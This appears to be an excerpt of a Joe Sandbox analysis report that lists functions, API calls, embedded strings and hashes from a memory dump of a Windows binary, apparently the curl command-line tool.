                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: puts$__acrt_iob_func
                                        • String ID: %s$ <none>$Build-time engines:
                                        • API String ID: 1292152210-2903797034
                                        • Opcode ID: cb5dc14c0a0e213f9811c4973893d76f11387e1d48f3c496812622eb20b71a1e
                                        • Instruction ID: ad31c41a88c39f9083f23036f392cd3bbe70addcc89f9a753111f59d70e6d258
                                        • Opcode Fuzzy Hash: cb5dc14c0a0e213f9811c4973893d76f11387e1d48f3c496812622eb20b71a1e
                                        • Instruction Fuzzy Hash: 75018671905208EBCB18EB94D912EEE7BB4BF14710F14406EF405A3282DF705F409799
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 0010C3E2
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 0010C5B5
                                        Strings
                                        • Excessive server response line length received, %zd bytes. Stripping, xrefs: 0010C525
                                        • response reading failed, xrefs: 0010C441
                                        • cached response data too big to handle, xrefs: 0010C5EC
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: freemalloc
                                        • String ID: Excessive server response line length received, %zd bytes. Stripping$cached response data too big to handle$response reading failed
                                        • API String ID: 3061335427-1004035239
                                        • Opcode ID: 4512bde999c9c1ad86528b792d7b7f6074668bd6444cd4a40829fcca7460f7c4
                                        • Instruction ID: 202ffed047cc3d05ae34def3694db552454ed1ddb7a0855dbaabd00cb1bb7bec
                                        • Opcode Fuzzy Hash: 4512bde999c9c1ad86528b792d7b7f6074668bd6444cd4a40829fcca7460f7c4
                                        • Instruction Fuzzy Hash: 3AA19175A0070AAFDB04CFA4C891AAEFBB5FF48310F10C52AE855A7281D7B1A951CFD0
                                        APIs
                                          • Part of subcall function 0010AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010ABCC
                                          • Part of subcall function 0010AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010ABFD
                                          • Part of subcall function 0010AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000E9633,00000000), ref: 0010AC1F
                                          • Part of subcall function 0010AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010AC36
                                          • Part of subcall function 0010AB9A: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010AC50
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00100F4D,?,?,000F0D79,?,?,00000000,?,?,?,000F0B5D), ref: 0010A8FF
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00100F4D,?,?,000F0D79,?,?,00000000,?,?,?,000F0B5D,?), ref: 0010A94A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$callocmalloc
                                        • String ID: NTLM$SSPI: couldn't get auth info
                                        • API String ID: 1437353635-1544621284
                                        • Opcode ID: 164a280e02e2df0c51cb75fbcd5a0c8b99292874d0dd2ee00ee68a13de30e964
                                        • Instruction ID: 842eb220cd505af580e3f4c759bce14fa96db9150b7fe138a403e979c0d1c1e4
                                        • Opcode Fuzzy Hash: 164a280e02e2df0c51cb75fbcd5a0c8b99292874d0dd2ee00ee68a13de30e964
                                        • Instruction Fuzzy Hash: 6751A17160460AEFDB18CF54DD849AE7BE9FF48350B50802AE845E36D0DBB0AD55CF92
                                        APIs
                                          • Part of subcall function 000D09FA: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 000D0A07
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00101DC6
                                        Strings
                                        • *, xrefs: 00101C60
                                        • Written %zu bytes, %I64u bytes are left for transfer, xrefs: 00101D7B
                                        • Failed to parse FETCH response., xrefs: 00101CA0
                                        • Found %I64d bytes to download, xrefs: 00101D02
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _errnofree
                                        • String ID: *$Failed to parse FETCH response.$Found %I64d bytes to download$Written %zu bytes, %I64u bytes are left for transfer
                                        • API String ID: 1830139605-1126424615
                                        • Opcode ID: db36c51d1f19f20c6eb1359efffba10c702adea42927799119ef0b79cd67e19f
                                        • Instruction ID: 8ab2a9952d46f1fb2ef7d580b975246130c3afb0370a856d7b4fbcf9cb422f0e
                                        • Opcode Fuzzy Hash: db36c51d1f19f20c6eb1359efffba10c702adea42927799119ef0b79cd67e19f
                                        • Instruction Fuzzy Hash: BE51E8B1A40205BFEB14DB28C985FBAB7B5FF85324F54416EE448A72C2D774AD418790
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000F0591,00000001,00000000,00000000,00000000,?,?,?), ref: 00106847
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: malloc
                                        • String ID: %c%c%c%c$%c%c%c=$%c%c==$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                                        • API String ID: 2803490479-989668499
                                        • Opcode ID: d491d5016166823f7651491bb9e6b710c48ace5eda441c5597cda59cd1ddd66c
                                        • Instruction ID: 776d4957a7766d43cf45194ce49ae13077ad8e123e4b12777ce81bfc0cb51640
                                        • Opcode Fuzzy Hash: d491d5016166823f7651491bb9e6b710c48ace5eda441c5597cda59cd1ddd66c
                                        • Instruction Fuzzy Hash: 29415B729046946FD7068B7888647BF7FF99F5A301F1840DAE8E1D73C2D6B58A12CB60
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 000EE61D
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 000EE657
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,00000000), ref: 000EE6F0
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,00000000), ref: 000EE70A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: freemalloc
                                        • String ID: Shuffling %i addresses
                                        • API String ID: 3061335427-3589116693
                                        • Opcode ID: 7c546b421a650366b4f871be9b9e186b7a984b1445d0bd8172a06e98cd0cdcf0
                                        • Instruction ID: 3e27bd594d2e9bc412221430776779fa14ee69b982aafc176d1e9e8dad51f549
                                        • Opcode Fuzzy Hash: 7c546b421a650366b4f871be9b9e186b7a984b1445d0bd8172a06e98cd0cdcf0
                                        • Instruction Fuzzy Hash: 8D417B75E0466ADFCB18CF69D8808AEBBF5FF48350B14406AE845E7350DB30AD12CB80
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000CFD9E
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000B08), ref: 000CFDBD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000CFDCC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: callocfreemalloc
                                        • String ID: %s in URL position %zu:%s%*s^$curl: (%d) %s
                                        • API String ID: 4086611775-2317922172
                                        • Opcode ID: f890eb599fc3061f780cf2c76151178dc6427f8804aaa2e94c8354d424d4f16c
                                        • Instruction ID: 4fec961736e818142588cb67565c96c957a8d3845684370338a2998c457faf42
                                        • Opcode Fuzzy Hash: f890eb599fc3061f780cf2c76151178dc6427f8804aaa2e94c8354d424d4f16c
                                        • Instruction Fuzzy Hash: E941E575A0030A9FDB28DF68C844FFEB7F6EB99314F1041ADE41A97242EB715E418B61
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FE0B6
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FE0D4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FE0EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Failure sending QUIT command: %s$QUIT
                                        • API String ID: 1294909896-1162443993
                                        • Opcode ID: dd285b2f8a44bd9c52fa7eb3bd82eb17d2db16dc8d13453ca4d53f36fffb1484
                                        • Instruction ID: 37608d919b49e8a3194504da0aae1d1d1e0b1d9cb207d17c9a1b515d141c5546
                                        • Opcode Fuzzy Hash: dd285b2f8a44bd9c52fa7eb3bd82eb17d2db16dc8d13453ca4d53f36fffb1484
                                        • Instruction Fuzzy Hash: 73312770704745ABDB249F34D884BAAB7D5FF44314F04817EE91987692DFF4A88087A5
                                        APIs
                                        • ___from_strstr_to_strchr.LIBCMT ref: 000C6762
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C6790
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(10000000), ref: 000C67A9
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C67D1
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(01000000), ref: 000C67EA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: _strdupfree$___from_strstr_to_strchr
                                        • String ID:
                                        • API String ID: 104559748-0
                                        • Opcode ID: ba3159e34f558b03fdbb57f61e187913229376ee4cd7a491249930d5a2116b64
                                        • Instruction ID: 816246fa74b01f15d68622ad86ba73645b60d97f49dceca3b5f1cdf2db0ecd55
                                        • Opcode Fuzzy Hash: ba3159e34f558b03fdbb57f61e187913229376ee4cd7a491249930d5a2116b64
                                        • Instruction Fuzzy Hash: 4831AC311087419FC379CF289454B6FBBE1BF8A314F284E5DE48A87591DB31E846CB41
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001015B1
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001015CF
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00101629
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Cannot SELECT without a mailbox.$SELECT %s
                                        • API String ID: 1294909896-2454231232
                                        • Opcode ID: 30bb45e29dd2ef0a2112504b7438dbcb12be3d7ece8a5e6c2440682e380487e0
                                        • Instruction ID: d1775a39e65589e00bf4eb5f52fcde041659ded7507c1e427624a986c914e829
                                        • Opcode Fuzzy Hash: 30bb45e29dd2ef0a2112504b7438dbcb12be3d7ece8a5e6c2440682e380487e0
                                        • Instruction Fuzzy Hash: 1D112632700111FFC7185B14EC45BA9B7A5FF84320F10806BE945AB291DBF4AC118BE8
                                        APIs
                                          • Part of subcall function 000D21C0: FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,000C8EF6), ref: 000D2208
                                          • Part of subcall function 000D21C0: WSACleanup.WS2_32 ref: 000D2227
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C8EF9
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C8F13
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C8F2B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C8F38
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C8F57
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free$fclose$CleanupFreeLibrary
                                        • String ID:
                                        • API String ID: 3795980997-0
                                        • Opcode ID: 761298a07904b6f9e39af0f612b5bde4ced820fb203bb86f3fece0525eb4634a
                                        • Instruction ID: 5b6bb4b2b91180f7e0e5ed9f264a54ddd2f71da523742f475e5a0a025e58384b
                                        • Opcode Fuzzy Hash: 761298a07904b6f9e39af0f612b5bde4ced820fb203bb86f3fece0525eb4634a
                                        • Instruction Fuzzy Hash: 4F015B76601A22EFC7555F51E948A4DFBA2FF44B62714823FF50056A21CB70A8A1CBD4
                                        APIs
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000000,000CD880), ref: 000C87AC
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,?), ref: 000C87B4
                                        • _getch.API-MS-WIN-CRT-CONIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,?), ref: 000C87C4
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002), ref: 000C87EF
                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00117668,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C87FB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __acrt_iob_funcfputs$_getch
                                        • String ID:
                                        • API String ID: 3073499726-0
                                        • Opcode ID: 9315f2d3a0f159414f7b3755e26b3f002406ae55e905cbcbb1c2fbc3476c6281
                                        • Instruction ID: bf632086fab6f8b6fb2d8c9293a0401035214e3a785792af5b5ae05342ba316d
                                        • Opcode Fuzzy Hash: 9315f2d3a0f159414f7b3755e26b3f002406ae55e905cbcbb1c2fbc3476c6281
                                        • Instruction Fuzzy Hash: 7CF04C33954A51DBC734232C5C0DFEEAB95DFC170AF28823EF59483141EA958C8683AE
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,000C29A6), ref: 000C3AA3
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,000C29A6), ref: 000C3AB1
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,000C29A6), ref: 000C3ABD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,000C29A6), ref: 000C3AC9
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,000C29A6), ref: 000C3AD5
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,000C29A6), ref: 000C3AE7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: dce3d1e9657d5d6851fc4d005c993a4ede667fe7ce10beda9c6a19a2f7c3ecf3
                                        • Instruction ID: bad2a3428695d3c4cc1836f439b85e7a00867c15caa7959d4136062ff5b21280
                                        • Opcode Fuzzy Hash: dce3d1e9657d5d6851fc4d005c993a4ede667fe7ce10beda9c6a19a2f7c3ecf3
                                        • Instruction Fuzzy Hash: 8201EC36502B01DFC7755F55D948AAEBBF2AF88701300C90DF89757A21C730A5559F92
                                        APIs
                                          • Part of subcall function 000D027A: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,?,?,000C10B6), ref: 000D028E
                                          • Part of subcall function 000D027A: __alldvrm.LIBCMT ref: 000D02A7
                                          • Part of subcall function 000D027A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D02D1
                                        • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 000CC75B
                                          • Part of subcall function 000D6BA2: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,0000038F,?,000CC775), ref: 000D6BC3
                                          • Part of subcall function 000D6BA2: WSACreateEvent.WS2_32 ref: 000D6C4D
                                        Strings
                                        • Transfer aborted due to critical error in another transfer, xrefs: 000CC87D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: CounterCreateEventPerformanceQueryUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@_time64calloc
                                        • String ID: Transfer aborted due to critical error in another transfer
                                        • API String ID: 934473979-1939301410
                                        • Opcode ID: 4039c3165d9dcabcd5abe79cb1e5e5200e234be5e9f7be80ac92cf2dd59bc570
                                        • Instruction ID: 2963e21c877e022adcb09b7b35d5d9560429c25b7589d8fd315a5777877ee6df
                                        • Opcode Fuzzy Hash: 4039c3165d9dcabcd5abe79cb1e5e5200e234be5e9f7be80ac92cf2dd59bc570
                                        • Instruction Fuzzy Hash: 11A1AF71D04249ABEF15CBA8C448FEEBBF1EB45304F1841AEE819A7252D7719E45CB90
                                        APIs
                                        • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 000D012E
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,internal error: invalid pattern type (%d),?), ref: 000D0224
                                        Strings
                                        • %0*lu, xrefs: 000D018E
                                        • internal error: invalid pattern type (%d), xrefs: 000D021D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __acrt_iob_funcstrtoul
                                        • String ID: %0*lu$internal error: invalid pattern type (%d)
                                        • API String ID: 673873880-449433499
                                        • Opcode ID: 48676d379543fa4a617d5d33e80e1dcb04e6516910db335cd904903a3baa1b98
                                        • Instruction ID: 843a67a9b7bec64c72344a509ad988fcacd374dd8115c4e9c0e7b2a49c390337
                                        • Opcode Fuzzy Hash: 48676d379543fa4a617d5d33e80e1dcb04e6516910db335cd904903a3baa1b98
                                        • Instruction Fuzzy Hash: 5C51BF39A053059BCF28CF64D894BFEBBB1AF59350F14416EE84AA7382DB319945CB70
                                        APIs
                                        • recvfrom.WS2_32(?,?,?,00000000,?,?), ref: 000F8704
                                        Strings
                                        • Internal error: Unexpected packet, xrefs: 000F88AB
                                        • Received too short packet, xrefs: 000F874C
                                        • TFTP error: %s, xrefs: 000F8819
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: recvfrom
                                        • String ID: Internal error: Unexpected packet$Received too short packet$TFTP error: %s
                                        • API String ID: 846543921-343195773
                                        • Opcode ID: 743bbf6ea0df10447b65b6118402e7a238b038fccca03b23546b461100a7795e
                                        • Instruction ID: b04b88267159e617bb37cd794ec80a2a5210306e30e44522afb11cef281e3132
                                        • Opcode Fuzzy Hash: 743bbf6ea0df10447b65b6118402e7a238b038fccca03b23546b461100a7795e
                                        • Instruction Fuzzy Hash: AC5126716002199FDB5CDA388C95BF9F7E4BB84310F04C27AE65ED6682DF34E9419BA0
                                        APIs
                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000000,00000000,blobpointer,?,?,?,?,?,?,?,?), ref: 000CEA46
                                        • isprint.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?), ref: 000CEAF7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: isprintmalloc
                                        • String ID: \x%02x$blobpointer
                                        • API String ID: 3792030756-13518461
                                        • Opcode ID: 358467933cdbbc46f777b2f50a6aa706ef96d9f541463ff8c155f64a19876a97
                                        • Instruction ID: cd925218b63d7bf13cb8275b57b2137dfd7e71f20e5b01c47d069aeed7fab82b
                                        • Opcode Fuzzy Hash: 358467933cdbbc46f777b2f50a6aa706ef96d9f541463ff8c155f64a19876a97
                                        • Instruction Fuzzy Hash: EA412A39A042C6AEDB349F68D801BADBBF1BF58314F28416EE499D3792D3305D91C711
